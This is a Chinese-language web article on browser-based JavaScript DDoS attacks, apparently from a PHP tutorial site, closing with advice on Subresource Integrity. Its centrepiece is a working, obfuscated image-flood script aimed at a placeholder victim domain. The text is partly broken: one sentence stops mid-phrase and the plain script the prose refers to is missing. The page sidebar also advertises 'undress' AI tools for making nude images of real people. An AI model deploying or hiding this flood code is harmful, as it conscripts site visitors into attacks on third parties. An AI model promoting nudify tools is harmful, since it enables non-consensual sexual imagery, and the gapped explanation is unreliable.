In-depth analysis of JavaScript-based DDOS attacks
最古老、最普遍、却又最可怕的攻击非DDoS攻击莫属。
在传统的DDoS攻击中,攻击者会控制大量的傀儡机,然后向目标服务器发送大量请求,阻止合法用户访问网站。
然而,最近几年DDoS攻击技术不断推陈出新:攻击者用一种新型且很有趣的方式欺骗用户参与到攻击活动中:使用恶意的JavaScript欺骗用户参与DDoS攻击。
基于JavaScript的DDOS攻击有一个非比寻常的特点:任何有浏览器的设备都可能参与攻击,其潜在攻击规模接近无限。
基于JavaScript的DDOS攻击原理
现代网站的交互作用大多数都是采用JavaScript。JavaScript脚本可直接注入HTML中,或者通过
该脚本会在目标网页上生成一个图片按钮,图片按钮会指向“’victim-website.com” 网站。只要用户访问了含有该脚本的网页,那么他就会成为 “’victim-website.com”DDoS攻击中的一员。浏览器发出的每一个请求都是有效请求,于是该攻击又变成了Layer 7 攻击。
由于是JS代码,所以通过查看网页源码,可以直接的看到攻击代码,发现是攻击网页。但如果以上的代码经过JShaman的混淆,JS代码会被保护起来,更难以被识别和发现:
var _0x9ea1=['victim\\x2dwebsite\\x2ecom','\\x2findex\\x2ephp\\x3f','floor','random','src','http\\x3a\\x2f\\x2f',
'\\x3dval'];(function(_0xa439d7,_0x7a3f17){var _0x2fcd4b=function(_0x1be501){while(--_0x1be501){_0xa439d7
['\\x70\\x75\\x73\\x68'](_0xa439d7['\\x73\\x68\\x69\\x66\\x74']());}};_0x2fcd4b(++_0x7a3f17);}(_0x9ea1,0xa1));
var _0x19ea=function(_0x3ac308,_0x2c1ecf){_0x3ac308=_0x3ac308-0x0;var _0x393163=_0x9ea1
[_0x3ac308];return _0x393163;};function imgflood(){var _0xcb2cd4=_0x19ea('0x0');var _0x3d1bbb=_0x19ea('0x1');
var _0x189885=new Image();var _0x2dfc3a=Math[_0x19ea('0x2')](Math[_0x19ea('0x3')]()*0x3e8);_0x189885
[_0x19ea('0x4')]=_0x19ea('0x5')+_0xcb2cd4+_0x3d1bbb+_0x2dfc3a+_0x19ea('0x6');}setInterval(imgflood,0xa);如果攻击者入侵了一个网站,在网站js文件中嵌入了类似上面的恶意JavaScript脚本,那么该网站的每一个访客都将成为DDoS攻击中的一员。网站流量越高就意味着DDoS越严重。
如何防止这种攻击?
目前HTTP还没有相关的机制来阻止该脚本的运行,但W3C已经提出了名叫子资源完整性(SRI)的新功能,使用加密哈希值验证脚本,如果哈希值不匹配浏览器可以阻止其运行。
例如,如下脚本标签:
<script src="https://code.jquery.com/jquery-1.10.2.min.js">
浏览器会自动下载该.js文件,并且会不分青红皂白的运行它。即使该文件中被攻击者注入了恶意脚本,浏览器也不会识别(也识别不出)。然而如果网站发现了哈希值验证脚本不匹配,子资源完整性(SRI)会告诉浏览器不要运行该脚本。
建议网站管理员将添加这一标签添加到服务器上,用以保护其用户不被利用。
推荐相关教程:web服务器安全
The above is the detailed content of In-depth analysis of JavaScript-based DDOS attacks. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
Notepad++7.3.1
Easy-to-use and free code editor
MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
